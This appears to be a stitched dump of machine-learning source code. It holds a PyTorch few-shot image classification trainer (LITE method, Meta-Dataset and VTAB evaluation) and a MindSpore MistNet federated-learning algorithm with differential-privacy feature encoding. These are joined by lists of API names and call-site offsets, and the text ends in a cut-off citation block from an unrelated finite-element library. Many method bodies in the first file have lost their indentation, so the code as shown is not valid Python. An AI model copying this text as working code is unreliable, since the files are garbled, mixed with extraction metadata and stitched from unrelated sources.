        # (small_task / no_lite) uses train_task.
        if self.args.train_method == 'lite':
            self.train_fn = self.train_lite
        else:
            self.train_fn = self.train_task
        # Batched context processing for every method except 'no_lite'.
        self.use_batches = False if self.args.train_method == 'no_lite' else True
        self.loss = cross_entropy_loss
        self.accuracy_fn = compute_accuracy
        self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.args.learning_rate)
        self.validation_accuracies = ValidationAccuracies(self.validation_set)
        self.start_iteration = 0
        if self.args.resume_from_checkpoint:
            self.load_checkpoint()
        # Start from zeroed gradients (they may accumulate across tasks_per_step tasks).
        self.optimizer.zero_grad()
        self.feature_cache = None
def init_model(self):
model = FewShotClassifier(args=self.args, logger=self.logger, device=self.device).to(self.device)
model.count_parameters(model)
# set encoder is always in train mode (it only sees context data).
# Feature extractor gets switched in model.
model.train()
return model
def init_data(self):
train_set = ['ilsvrc_2012', 'omniglot', 'aircraft', 'cu_birds', 'dtd', 'quickdraw', 'fungi', 'mnist']
validation_set = ['omniglot', 'aircraft', 'cu_birds', 'dtd', 'quickdraw', 'fungi', 'mscoco']
test_set = self.args.test_datasets
return train_set, validation_set, test_set
"""
Command line parser
"""
def parse_command_line(self):
parser = argparse.ArgumentParser()
# operational parameters
parser.add_argument("--mode", choices=["train", "test", "train_test", "test_vtab"], default="train_test",
help="Whether to run meta-training only, meta-testing only,"
"both meta-training and meta-testing, or testing on vtab.")
parser.add_argument("--checkpoint_dir", "-c", default='../checkpoints', help="Directory to save checkpoint to.")
parser.add_argument("--resume_from_checkpoint", "-r", dest="resume_from_checkpoint", default=False,
action="store_true", help="Restart from latest checkpoint.")
# data parameters
parser.add_argument('--test_datasets', nargs='+', help='Datasets to use for testing',
default=["omniglot", "aircraft", "cu_birds", "dtd", "quickdraw", "fungi", "traffic_sign",
"mscoco"])
parser.add_argument("--data_path", default="../datasets", help="Path to Meta-Dataset records.")
parser.add_argument("--download_path_for_tensorflow_datasets", default=None,
help="Path to download the tensorflow datasets.")
parser.add_argument("--download_path_for_sun397_dataset", default=None,
help="Path to download the sun397 dataset.")
# training parameters
parser.add_argument("--train_method", choices=["lite", "small_task", "no_lite"], default="lite",
help="Whether to use lite, small tasks, or not lite.")
parser.add_argument("--pretrained_model_path", default="../models/efficientnet-b0_84.pt",
help="Path to dataset records.")
parser.add_argument("--learning_rate", "-lr", type=float, default=0.001, help="Learning rate.")
parser.add_argument("--tasks_per_step", type=int, default=16,
help="Number of tasks between parameter optimizations.")
parser.add_argument("--training_iterations", "-i", type=int, default=10000,
help="Number of meta-training iterations.")
parser.add_argument("--max_way_train", type=int, default=50, help="Maximum way of meta-train task.")
parser.add_argument("--max_support_train", type=int, default=500,
help="Maximum support set size of meta-train task.")
parser.add_argument("--image_size", type=int, default=224, help="Image height and width.")
parser.add_argument("--batch_size", type=int, default=40, help="Size of batch.")
parser.add_argument("--h", type=int, default=40,
help="Number of support set samples to back-propagate when training with LITE.")
# testing parameters
parser.add_argument("--test_model_path", "-m", default=None, help="Path to model to load and test.")
parser.add_argument("--val_freq", type=int, default=5000, help="Number of iterations between validations.")
args = parser.parse_args()
return args
    def run(self):
        """Execute the configured mode: meta-train (with periodic checkpointing
        and validation), then/or meta-test, or VTAB transfer testing.

        Gradients accumulate across tasks and the optimizer steps every
        ``tasks_per_step`` tasks (and once more at the final iteration).
        """
        if self.args.mode == 'train' or self.args.mode == 'train_test':
            train_accuracies = []
            losses = []
            total_iterations = self.args.training_iterations
            for iteration in range(self.start_iteration, total_iterations):
                task_dict = self.dataset.get_train_task()
                context_images, target_images, context_labels, target_labels = self.prepare_task(task_dict)
                if self.use_batches:
                    # LITE path: reset per-task caches, then process the
                    # target set in batches (one backward pass per batch).
                    self.model.clear_caches()
                    self.feature_cache = None
                    target_set_size = len(target_labels)
                    num_batches = self._get_number_of_batches(target_set_size)
                    for batch in range(num_batches):
                        batch_start_index, batch_end_index = self._get_batch_indices(batch, target_set_size)
                        batch_loss, batch_accuracy = self.train_fn(
                            context_images,
                            target_images[batch_start_index : batch_end_index],
                            context_labels,
                            target_labels[batch_start_index : batch_end_index]
                        )
                        train_accuracies.append(batch_accuracy)
                        losses.append(batch_loss)
                else:
                    task_loss, task_accuracy = self.train_fn(context_images, target_images, context_labels,
                                                             target_labels)
                    train_accuracies.append(task_accuracy)
                    losses.append(task_loss)
                # optimize
                if ((iteration + 1) % self.args.tasks_per_step == 0) or (iteration == (total_iterations - 1)):
                    self.optimizer.step()
                    self.optimizer.zero_grad()
                if (iteration + 1) % PRINT_FREQUENCY == 0:
                    # print training stats
                    self.save_checkpoint(iteration + 1)
                    torch.save(self.model.state_dict(), os.path.join(self.log_files.checkpoint_dir,
                                                                     "model_{}.pt".format(iteration + 1)))
                    self.logger.print_and_log('Task [{}/{}], Train Loss: {:.7f},'
                                              'Train Accuracy: {:.7f}, Learning Rate: {:.7f}'
                                              .format(iteration + 1, total_iterations,
                                                      torch.Tensor(losses).mean().item(),
                                                      torch.Tensor(train_accuracies).mean().item(),
                                                      self.optimizer.param_groups[0]['lr']))
                    train_accuracies = []
                    losses = []
                if ((iteration + 1) % self.args.val_freq == 0) and (iteration + 1) != total_iterations:
                    # validate
                    accuracy_dict = self.validate()
                    self.validation_accuracies.print(self.logger, accuracy_dict)
                    # save the model if validation is the best so far
                    if self.validation_accuracies.is_better(accuracy_dict):
                        self.validation_accuracies.replace(accuracy_dict)
                        torch.save(self.model.state_dict(), self.log_files.best_validation_model_path)
                        self.logger.print_and_log('Best validation model was updated.')
                        self.logger.print_and_log('')
            # save the final model
            torch.save(self.model.state_dict(), self.log_files.fully_trained_model_path)
        if self.args.mode == 'train_test':
            self.test(self.log_files.fully_trained_model_path)
            self.test(self.log_files.best_validation_model_path)
        if self.args.mode == 'test':
            self.test(self.args.test_model_path)
        if self.args.mode == 'test_vtab':
            self._test_transfer_learning(self.args.test_model_path)
def train_task(self, context_images, target_images, context_labels, target_labels):
target_logits = self.model(context_images, context_labels, target_images, MetaLearningState.META_TRAIN)
task_loss = self.loss(target_logits, target_labels) / self.args.tasks_per_step
regularization_term = (self.model.feature_adaptation_network.regularization_term())
regularizer_scaling = 0.001
task_loss += regularizer_scaling * regularization_term
task_accuracy = self.accuracy_fn(target_logits, target_labels)
task_loss.backward(retain_graph=False)
return task_loss, task_accuracy
    def train_lite(self, context_images, target_images, context_labels, target_labels):
        """One LITE training step: back-propagate through only ``h`` randomly
        chosen context examples, reusing cached no-gradient features for the
        rest, then compute loss/accuracy on the given target batch.

        Returns (loss, accuracy); gradients accumulate until ``run()`` steps.
        """
        # We'll split the context set into two: the first part will be of size batch_size and we'll use gradients
        # for that. The second part will be everything else and we'll use no gradients for that, so we only need to
        # compute that once per task.
        context_size = context_images.size(0)
        indices = np.random.permutation(context_size)
        h = min(self.args.h, context_size)  # number of example to back propagate
        grad_indices = indices[0: h]
        no_grad_indices = indices[h:]
        self.model.build_task_representation_with_split_batch(context_images, grad_indices, no_grad_indices)
        context_features = self._compute_features_with_split_batch(context_images, grad_indices, no_grad_indices,
                                                                   MetaLearningState.META_TRAIN)
        # Labels must be permuted consistently with the shuffled features.
        self.model.configure_classifier(context_features, context_labels[indices])
        # now the target set
        torch.set_grad_enabled(True)
        batch_logits = self.model.predict(target_images, MetaLearningState.META_TRAIN)
        # compute the loss
        batch_loss = self.loss(batch_logits, target_labels) / self.args.tasks_per_step
        regularization_term = (self.model.feature_adaptation_network.regularization_term())
        regularizer_scaling = 0.001
        batch_loss += regularizer_scaling * regularization_term
        # compute accuracy
        batch_accuracy = self.accuracy_fn(batch_logits, target_labels)
        batch_loss.backward(retain_graph=False)
        return batch_loss, batch_accuracy
def _get_number_of_batches(self, task_size):
num_batches = int(np.ceil(float(task_size) / float(self.args.batch_size)))
if num_batches > 1 and (task_size % self.args.batch_size == 1):
num_batches -= 1
return num_batches
def _get_batch_indices(self, index, last_element):
batch_start_index = index * self.args.batch_size
batch_end_index = batch_start_index + self.args.batch_size
if batch_end_index == (last_element - 1): # avoid batch size of 1
batch_end_index = last_element
if batch_end_index > last_element:
batch_end_index = last_element
return batch_start_index, batch_end_index
    def validate(self):
        """Evaluate the current model on NUM_VALIDATION_TASKS tasks per
        validation dataset.

        Returns a dict mapping dataset name to {"accuracy", "confidence"}
        where accuracy is a percentage and confidence is 196 * std / sqrt(n)
        (presumably a 95% interval in percentage points — verify).
        """
        with torch.no_grad():
            accuracy_dict ={}
            for item in self.validation_set:
                accuracies = []
                for _ in range(NUM_VALIDATION_TASKS):
                    task_dict = self.dataset.get_validation_task(item)
                    context_images, target_images, context_labels, target_labels = self.prepare_task(task_dict)
                    if self.use_batches:
                        # Batched (LITE-style) evaluation of the target set.
                        self.model.build_task_representation_by_batch(context_images)
                        context_features = self._compute_features_by_batch(context_images, MetaLearningState.META_TEST)
                        self.model.configure_classifier(context_features, context_labels)
                        test_set_size = len(target_labels)
                        num_batches = self._get_number_of_batches(test_set_size)
                        target_logits = []
                        for batch in range(num_batches):
                            batch_start_index, batch_end_index = self._get_batch_indices(batch, test_set_size)
                            batch_logits = self.model.predict(target_images[batch_start_index: batch_end_index],
                                                              MetaLearningState.META_TEST)
                            target_logits.append(batch_logits)
                        target_logits = torch.vstack(target_logits)
                        target_accuracy = self.accuracy_fn(target_logits, target_labels)
                        del target_logits
                        accuracies.append(target_accuracy.item())
                    else:
                        target_logits = self.model(context_images, context_labels, target_images, MetaLearningState.META_TEST)
                        accuracy = self.accuracy_fn(target_logits, target_labels)
                        accuracies.append(accuracy.item())
                        del target_logits
                accuracy = np.array(accuracies).mean() * 100.0
                confidence = (196.0 * np.array(accuracies).std()) / np.sqrt(len(accuracies))
                accuracy_dict[item] = {"accuracy": accuracy, "confidence": confidence}
        return accuracy_dict
    def test(self, path):
        """Meta-test the model saved at ``path`` on NUM_TEST_TASKS tasks per
        test dataset, logging mean accuracy with a confidence interval.

        A fresh model is built first; weights are loaded unless ``path`` is
        the literal string 'None'.
        """
        self.logger.print_and_log("")  # add a blank line
        self.logger.print_and_log('Testing model {0:}: '.format(path))
        self.model = self.init_model()
        if path != 'None':
            self.model.load_state_dict(torch.load(path))
        with torch.no_grad():
            for item in self.test_set:
                accuracies = []
                for _ in range(NUM_TEST_TASKS):
                    task_dict = self.dataset.get_test_task(item)
                    context_images, target_images, context_labels, target_labels = self.prepare_task(task_dict)
                    if self.use_batches:
                        # Batched (LITE-style) evaluation of the target set.
                        self.model.build_task_representation_by_batch(context_images)
                        context_features = self._compute_features_by_batch(context_images, MetaLearningState.META_TEST)
                        self.model.configure_classifier(context_features, context_labels)
                        test_set_size = len(target_labels)
                        num_batches = self._get_number_of_batches(test_set_size)
                        target_logits = []
                        for batch in range(num_batches):
                            batch_start_index, batch_end_index = self._get_batch_indices(batch, test_set_size)
                            batch_logits = self.model.predict(target_images[batch_start_index: batch_end_index],
                                                              MetaLearningState.META_TEST)
                            target_logits.append(batch_logits)
                        target_logits = torch.vstack(target_logits)
                        target_accuracy = self.accuracy_fn(target_logits, target_labels)
                        del target_logits
                        accuracies.append(target_accuracy.item())
                    else:
                        target_logits = self.model(context_images, context_labels, target_images,
                                                   MetaLearningState.META_TEST)
                        accuracy = self.accuracy_fn(target_logits, target_labels)
                        accuracies.append(accuracy.item())
                        del target_logits
                accuracy = np.array(accuracies).mean() * 100.0
                accuracy_confidence = (196.0 * np.array(accuracies).std()) / np.sqrt(len(accuracies))
                self.logger.print_and_log('{0:}: {1:3.1f}+/-{2:2.1f}'.format(item, accuracy, accuracy_confidence))
    def _test_transfer_learning(self, path):
        """Evaluate the model at ``path`` on the VTAB transfer-learning suite.

        For each enabled dataset, a context set of up to 1000 examples
        configures the classifier, then the whole target split is evaluated
        in batches and the accuracy percentage is logged.
        """
        self.logger.print_and_log("")  # add a blank line
        self.logger.print_and_log('Testing model {0:}: '.format(path))
        self.model = self.init_model()
        if path != 'None':
            self.model.load_state_dict(torch.load(path))
        context_set_size = 1000
        # VTAB task list; flip 'enabled' to False to skip a dataset.
        datasets = [
            {'name': "caltech101", 'task': None, 'enabled': True},
            {'name': "cifar100", 'task': None, 'enabled': True},
            {'name': "oxford_flowers102", 'task': None, 'enabled': True},
            {'name': "oxford_iiit_pet", 'task': None, 'enabled': True},
            {'name': "sun397", 'task': None, 'enabled': True},
            {'name': "svhn_cropped", 'task': None, 'enabled': True},
            {'name': "eurosat", 'task': None, 'enabled': True},
            {'name': "resisc45", 'task': None, 'enabled': True},
            {'name': "patch_camelyon", 'task': None, 'enabled': True},
            {'name': "diabetic_retinopathy_detection", 'task': None, 'enabled': True},
            {'name': "clevr", 'task': "count", 'enabled': True},
            {'name': "clevr", 'task': "distance", 'enabled': True},
            {'name': "dsprites", 'task': "location", 'enabled': True},
            {'name': "dsprites", 'task': "orientation", 'enabled': True},
            {'name': "smallnorb", 'task': "azimuth", 'enabled': True},
            {'name': "smallnorb", 'task': "elevation", 'enabled': True},
            {'name': "dmlab", 'task': None, 'enabled': True},
            {'name': "kitti", 'task': None, 'enabled': True},
        ]
        with torch.no_grad():
            for dataset in datasets:
                if dataset['enabled'] is False:
                    continue
                if dataset['name'] == "sun397":  # use the image folder reader as the tf reader is broken for sun397
                    dataset_reader = ImageFolderReader(
                        path_to_images=self.args.download_path_for_sun397_dataset,
                        context_batch_size=context_set_size,
                        target_batch_size=self.args.batch_size,
                        image_size=self.args.image_size,
                        device=self.device)
                else:  # use the tensorflow dataset reader
                    dataset_reader = TfDatasetReader(
                        dataset=dataset['name'],
                        task=dataset['task'],
                        context_batch_size=context_set_size,
                        target_batch_size=self.args.batch_size,
                        path_to_datasets=self.args.download_path_for_tensorflow_datasets,
                        image_size=self.args.image_size,
                        device=self.device
                    )
                context_images, context_labels = dataset_reader.get_context_batch()
                self.model.build_task_representation_by_batch(context_images)
                context_features = self._compute_features_by_batch(context_images, MetaLearningState.META_TEST)
                self.model.configure_classifier(context_features, context_labels)
                test_set_size = dataset_reader.get_target_dataset_length()
                num_batches = self._get_number_of_batches(test_set_size)
                target_logits = []
                target_labels = []
                for batch in range(num_batches):
                    batch_target_images, batch_target_labels = dataset_reader.get_target_batch()
                    batch_logits = self.model.predict(batch_target_images, MetaLearningState.META_TEST)
                    target_logits.append(batch_logits)
                    target_labels.append(batch_target_labels)
                target_logits = torch.vstack(target_logits)
                target_labels = torch.hstack(target_labels)
                target_accuracy = self.accuracy_fn(target_logits, target_labels)
                del target_logits
                accuracy = target_accuracy * 100.0
                if dataset['task'] is None:
                    self.logger.print_and_log('{0:}: {1:3.1f}'.format(dataset['name'], accuracy))
                else:
                    self.logger.print_and_log('{0:} {1:}: {2:3.1f}'.format(dataset['name'], dataset['task'], accuracy))
def _compute_features_by_batch(self, images, meta_learning_state):
features = []
num_images = images.size(0)
num_batches = self._get_number_of_batches(num_images)
for batch in range(num_batches):
batch_start_index, batch_end_index = self._get_batch_indices(batch, num_images)
features.append(self.model.get_context_features(images[batch_start_index: batch_end_index],
meta_learning_state))
return torch.vstack(features)
    def _compute_features_with_split_batch(self, images, grad_indices, no_grad_indices, meta_learning_state):
        """Compute context features for LITE: only ``grad_indices`` examples
        carry gradients; all other features come from a per-task no-grad
        cache (``self.feature_cache``, reset by ``run()`` for each task).

        Returns features ordered as grad examples followed by no-grad
        examples — callers must index labels with the same permutation.
        """
        num_images = images.size(0)
        if self.feature_cache is None:  # cache the part with no gradients
            features = []
            num_batches = self._get_number_of_batches(num_images)
            for batch in range(num_batches):
                batch_start_index, batch_end_index = self._get_batch_indices(batch, num_images)
                torch.set_grad_enabled(False)
                features.append(self.model.get_context_features(images[batch_start_index: batch_end_index],
                                                                meta_learning_state))
            # NOTE: the cache covers ALL images; no-grad ones are selected below.
            self.feature_cache = torch.vstack(features).to(self.device)
        # now select some random images for that will have gradients and process those
        embeddings = []
        if len(grad_indices) > 0:
            torch.set_grad_enabled(True)
            embeddings.append(self.model.get_context_features(images[grad_indices], meta_learning_state))
        # now add in the no_grad images
        embeddings.extend(self.feature_cache[no_grad_indices])
        return torch.vstack(embeddings)
def prepare_task(self, task_dict):
context_images_np, context_labels_np = task_dict['context_images'], task_dict['context_labels']
target_images_np, target_labels_np = task_dict['target_images'], task_dict['target_labels']
context_images_np = context_images_np.transpose([0, 3, 1, 2])
context_images_np, context_labels_np = shuffle(context_images_np, context_labels_np)
context_images = torch.from_numpy(context_images_np)
context_labels = torch.from_numpy(context_labels_np)
target_images_np = target_images_np.transpose([0, 3, 1, 2])
target_images_np, target_labels_np = shuffle(target_images_np, target_labels_np)
target_images = torch.from_numpy(target_images_np)
target_labels = torch.from_numpy(target_labels_np)
context_images = context_images.to(self.device)
target_images = target_images.to(self.device)
context_labels = context_labels.to(self.device)
target_labels = target_labels.type(torch.LongTensor).to(self.device)
return context_images, target_images, context_labels, target_labels
def save_checkpoint(self, iteration):
torch.save({
'iteration': iteration,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
'best_accuracy': self.validation_accuracies.get_current_best_accuracy_dict(),
}, os.path.join(self.log_files.checkpoint_dir, 'checkpoint.pt'))
def load_checkpoint(self):
checkpoint = torch.load(os.path.join(self.log_files.checkpoint_dir, 'checkpoint.pt'))
self.start_iteration = checkpoint['iteration']
self.model.load_state_dict(checkpoint['model_state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
self.validation_accuracies.replace(checkpoint['best_accuracy'])
if __name__ == "__main__":
main()
| [
"torch.from_numpy",
"numpy.array",
"torch.cuda.is_available",
"utils.ValidationAccuracies",
"torch.set_grad_enabled",
"argparse.ArgumentParser",
"utils.LogFiles",
"dataset.get_dataset_reader",
"tf_dataset_reader.TfDatasetReader",
"utils.shuffle",
"numpy.random.permutation",
"torch.Tensor",
"... | [((597, 729), 'utils.LogFiles', 'LogFiles', (['self.args.checkpoint_dir', 'self.args.resume_from_checkpoint', "(self.args.mode == 'test' or self.args.mode == 'test_vtab')"], {}), "(self.args.checkpoint_dir, self.args.resume_from_checkpoint, self.\n args.mode == 'test' or self.args.mode == 'test_vtab')\n", (605, 729), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((785, 828), 'utils.Logger', 'Logger', (['self.args.checkpoint_dir', '"""log.txt"""'], {}), "(self.args.checkpoint_dir, 'log.txt')\n", (791, 828), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((1951, 1992), 'utils.ValidationAccuracies', 'ValidationAccuracies', (['self.validation_set'], {}), '(self.validation_set)\n', (1971, 1992), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((2941, 2966), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2964, 2966), False, 'import argparse\n'), ((11198, 11233), 'numpy.random.permutation', 'np.random.permutation', (['context_size'], {}), '(context_size)\n', (11219, 11233), True, 'import numpy as np\n'), ((11833, 11861), 'torch.set_grad_enabled', 'torch.set_grad_enabled', (['(True)'], {}), '(True)\n', (11855, 11861), False, 'import torch\n'), ((22682, 22704), 'torch.vstack', 'torch.vstack', (['features'], {}), '(features)\n', (22694, 22704), False, 'import torch\n'), ((23887, 23911), 'torch.vstack', 'torch.vstack', (['embeddings'], {}), '(embeddings)\n', (23899, 23911), False, 'import torch\n'), ((24274, 24319), 'utils.shuffle', 'shuffle', (['context_images_np', 'context_labels_np'], {}), '(context_images_np, context_labels_np)\n', (24281, 24319), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, 
shuffle\n'), ((24345, 24380), 'torch.from_numpy', 'torch.from_numpy', (['context_images_np'], {}), '(context_images_np)\n', (24361, 24380), False, 'import torch\n'), ((24406, 24441), 'torch.from_numpy', 'torch.from_numpy', (['context_labels_np'], {}), '(context_labels_np)\n', (24422, 24441), False, 'import torch\n'), ((24556, 24599), 'utils.shuffle', 'shuffle', (['target_images_np', 'target_labels_np'], {}), '(target_images_np, target_labels_np)\n', (24563, 24599), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((24624, 24658), 'torch.from_numpy', 'torch.from_numpy', (['target_images_np'], {}), '(target_images_np)\n', (24640, 24658), False, 'import torch\n'), ((24683, 24717), 'torch.from_numpy', 'torch.from_numpy', (['target_labels_np'], {}), '(target_labels_np)\n', (24699, 24717), False, 'import torch\n'), ((1318, 1443), 'dataset.get_dataset_reader', 'get_dataset_reader', ([], {'args': 'self.args', 'train_set': 'self.train_set', 'validation_set': 'self.validation_set', 'test_set': 'self.test_set'}), '(args=self.args, train_set=self.train_set, validation_set\n =self.validation_set, test_set=self.test_set)\n', (1336, 1443), False, 'from dataset import get_dataset_reader\n'), ((13181, 13196), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (13194, 13196), False, 'import torch\n'), ((15664, 15679), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (15677, 15679), False, 'import torch\n'), ((19485, 19500), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (19498, 19500), False, 'import torch\n'), ((23632, 23660), 'torch.set_grad_enabled', 'torch.set_grad_enabled', (['(True)'], {}), '(True)\n', (23654, 23660), False, 'import torch\n'), ((25362, 25422), 'os.path.join', 'os.path.join', (['self.log_files.checkpoint_dir', '"""checkpoint.pt"""'], {}), "(self.log_files.checkpoint_dir, 'checkpoint.pt')\n", (25374, 25422), False, 'import os\n'), ((25488, 25548), 'os.path.join', 
'os.path.join', (['self.log_files.checkpoint_dir', '"""checkpoint.pt"""'], {}), "(self.log_files.checkpoint_dir, 'checkpoint.pt')\n", (25500, 25548), False, 'import os\n'), ((1036, 1061), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1059, 1061), False, 'import torch\n'), ((2218, 2291), 'model.FewShotClassifier', 'FewShotClassifier', ([], {'args': 'self.args', 'logger': 'self.logger', 'device': 'self.device'}), '(args=self.args, logger=self.logger, device=self.device)\n', (2235, 2291), False, 'from model import FewShotClassifier\n'), ((15632, 15648), 'torch.load', 'torch.load', (['path'], {}), '(path)\n', (15642, 15648), False, 'import torch\n'), ((18146, 18162), 'torch.load', 'torch.load', (['path'], {}), '(path)\n', (18156, 18162), False, 'import torch\n'), ((21618, 21645), 'torch.vstack', 'torch.vstack', (['target_logits'], {}), '(target_logits)\n', (21630, 21645), False, 'import torch\n'), ((21678, 21705), 'torch.hstack', 'torch.hstack', (['target_labels'], {}), '(target_labels)\n', (21690, 21705), False, 'import torch\n'), ((23178, 23207), 'torch.set_grad_enabled', 'torch.set_grad_enabled', (['(False)'], {}), '(False)\n', (23200, 23207), False, 'import torch\n'), ((19771, 19986), 'image_folder_reader.ImageFolderReader', 'ImageFolderReader', ([], {'path_to_images': 'self.args.download_path_for_sun397_dataset', 'context_batch_size': 'context_set_size', 'target_batch_size': 'self.args.batch_size', 'image_size': 'self.args.image_size', 'device': 'self.device'}), '(path_to_images=self.args.download_path_for_sun397_dataset,\n context_batch_size=context_set_size, target_batch_size=self.args.\n batch_size, image_size=self.args.image_size, device=self.device)\n', (19788, 19986), False, 'from image_folder_reader import ImageFolderReader\n'), ((20195, 20471), 'tf_dataset_reader.TfDatasetReader', 'TfDatasetReader', ([], {'dataset': "dataset['name']", 'task': "dataset['task']", 'context_batch_size': 'context_set_size', 'target_batch_size': 
'self.args.batch_size', 'path_to_datasets': 'self.args.download_path_for_tensorflow_datasets', 'image_size': 'self.args.image_size', 'device': 'self.device'}), "(dataset=dataset['name'], task=dataset['task'],\n context_batch_size=context_set_size, target_batch_size=self.args.\n batch_size, path_to_datasets=self.args.\n download_path_for_tensorflow_datasets, image_size=self.args.image_size,\n device=self.device)\n", (20210, 20471), False, 'from tf_dataset_reader import TfDatasetReader\n'), ((23435, 23457), 'torch.vstack', 'torch.vstack', (['features'], {}), '(features)\n', (23447, 23457), False, 'import torch\n'), ((14537, 14564), 'torch.vstack', 'torch.vstack', (['target_logits'], {}), '(target_logits)\n', (14549, 14564), False, 'import torch\n'), ((16972, 16999), 'torch.vstack', 'torch.vstack', (['target_logits'], {}), '(target_logits)\n', (16984, 16999), False, 'import torch\n'), ((15126, 15146), 'numpy.array', 'np.array', (['accuracies'], {}), '(accuracies)\n', (15134, 15146), True, 'import numpy as np\n'), ((17612, 17632), 'numpy.array', 'np.array', (['accuracies'], {}), '(accuracies)\n', (17620, 17632), True, 'import numpy as np\n'), ((15200, 15220), 'numpy.array', 'np.array', (['accuracies'], {}), '(accuracies)\n', (15208, 15220), True, 'import numpy as np\n'), ((17695, 17715), 'numpy.array', 'np.array', (['accuracies'], {}), '(accuracies)\n', (17703, 17715), True, 'import numpy as np\n'), ((8606, 8626), 'torch.Tensor', 'torch.Tensor', (['losses'], {}), '(losses)\n', (8618, 8626), False, 'import torch\n'), ((8696, 8726), 'torch.Tensor', 'torch.Tensor', (['train_accuracies'], {}), '(train_accuracies)\n', (8708, 8726), False, 'import torch\n')] |
"""
The federated learning trainer for MistNet, used by both the client and the
server.
Reference:
<NAME>, et al. "MistNet: Towards Private Neural Network Training with Local
Differential Privacy," found in docs/papers.
"""
import time
import logging
import mindspore
import mindspore.dataset as ds
from plato.utils import unary_encoding
from plato.algorithms.mindspore import fedavg
import multiprocessing
from plato.config import Config
class Algorithm(fedavg.Algorithm):
    """The MindSpore-based MistNet algorithm, used by both the client and the
    server.
    """
    def extract_features(self, dataset, cut_layer, epsilon=None):
        """Extracting features using layers before the cut_layer.

        dataset: The training or testing dataset.
        cut_layer: Layers before this one will be used for extracting features.
        epsilon: If epsilon is not None, local differential privacy should be
        applied to the features extracted.
        """
        self.model.set_train(False)

        tic = time.perf_counter()

        feature_dataset = []

        for inputs, targets in dataset:
            inputs = mindspore.Tensor(inputs)
            targets = mindspore.Tensor(targets)

            logits = self.model.forward_to(inputs, cut_layer)

            if epsilon is not None:
                # Apply local differential privacy via randomized unary encoding.
                logits = logits.asnumpy()
                logits = unary_encoding.encode(logits)
                logits = unary_encoding.randomize(logits, epsilon)
                logits = mindspore.Tensor(logits.astype('float32'))

            feature_dataset.append((logits, targets))

        toc = time.perf_counter()
        # Use lazy %-style logging arguments consistently (no eager .format()).
        logging.info("[Client #%d] Features extracted from %s examples.",
                     self.client_id, len(feature_dataset))
        logging.info("[Client #%d] Time used: %.2f seconds.", self.client_id,
                     toc - tic)

        return feature_dataset

    @staticmethod
    def dataset_generator(trainset):
        """The generator used to produce a suitable Dataset for the MindSpore
        trainer.

        Each trainset entry is (image, annotations) where annotations holds at
        least 10 fields: annotation, three y_true tensors, three gt_box
        tensors, image height, image width and the input shape. The yielded
        tuple is (image, *annotations[:10]), matching train()'s column names.
        """
        for entry in trainset:
            image, annotations = entry[0], entry[1]
            yield (image, *annotations[:10])

    def train(self, trainset, *args):
        """Train on the extracted features using a MindSpore GeneratorDataset
        pipeline, delegating the actual loop to ``self.trainer``."""
        # Column names must match the order yielded by dataset_generator.
        # NOTE: "img_hight" (sic) is kept — downstream consumers use this name.
        column_out_names = [
            "image", "annotation", "batch_y_true_0", "batch_y_true_1",
            "batch_y_true_2", "batch_gt_box0", "batch_gt_box1",
            "batch_gt_box2", "img_hight", "img_width", "input_shape"
        ]
        data_size = len(trainset)
        # Replaced leftover debug print with proper logging.
        logging.info("[Client #%d] Training on %d feature samples.",
                     self.client_id, data_size)

        dataset = ds.GeneratorDataset(
            source=list(Algorithm.dataset_generator(trainset)),
            column_names=column_out_names)

        per_batch_size = Config().trainer.per_batch_size
        repeat_epoch = Config().trainer.repeat_epoch
        group_size = Config().trainer.group_size

        dataset = dataset.batch(per_batch_size,
                                num_parallel_workers=1,
                                drop_remainder=True)
        dataset = dataset.repeat(repeat_epoch)

        self.trainer.train(dataset, data_size, per_batch_size, repeat_epoch,
                           group_size)
| [
"plato.utils.unary_encoding.encode",
"plato.utils.unary_encoding.randomize",
"time.perf_counter",
"plato.config.Config",
"mindspore.Tensor"
] | [((1030, 1049), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (1047, 1049), False, 'import time\n'), ((1617, 1636), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (1634, 1636), False, 'import time\n'), ((1142, 1166), 'mindspore.Tensor', 'mindspore.Tensor', (['inputs'], {}), '(inputs)\n', (1158, 1166), False, 'import mindspore\n'), ((1189, 1214), 'mindspore.Tensor', 'mindspore.Tensor', (['targets'], {}), '(targets)\n', (1205, 1214), False, 'import mindspore\n'), ((1382, 1411), 'plato.utils.unary_encoding.encode', 'unary_encoding.encode', (['logits'], {}), '(logits)\n', (1403, 1411), False, 'from plato.utils import unary_encoding\n'), ((1437, 1478), 'plato.utils.unary_encoding.randomize', 'unary_encoding.randomize', (['logits', 'epsilon'], {}), '(logits, epsilon)\n', (1461, 1478), False, 'from plato.utils import unary_encoding\n'), ((3312, 3320), 'plato.config.Config', 'Config', ([], {}), '()\n', (3318, 3320), False, 'from plato.config import Config\n'), ((3367, 3375), 'plato.config.Config', 'Config', ([], {}), '()\n', (3373, 3375), False, 'from plato.config import Config\n'), ((3418, 3426), 'plato.config.Config', 'Config', ([], {}), '()\n', (3424, 3426), False, 'from plato.config import Config\n')] |
import gem
from abc import ABCMeta, abstractmethod
try:
from firedrake_citations import Citations
Citations().add("Kirby2018zany", """
@Article{Kirby2018zany,
author = {<NAME>},
title = {A general approach to transforming finite elements},
journal = {SMAI Journal of Computational Mathematics},
year = 2018,
volume = 4,
pages = {197-224},
doi = {10.5802/smai-jcm.33},
archiveprefix ={arXiv},
eprint = {1706.09017},
primaryclass = {math.NA}
}
""")
Citations().add("Kirby2019zany", """
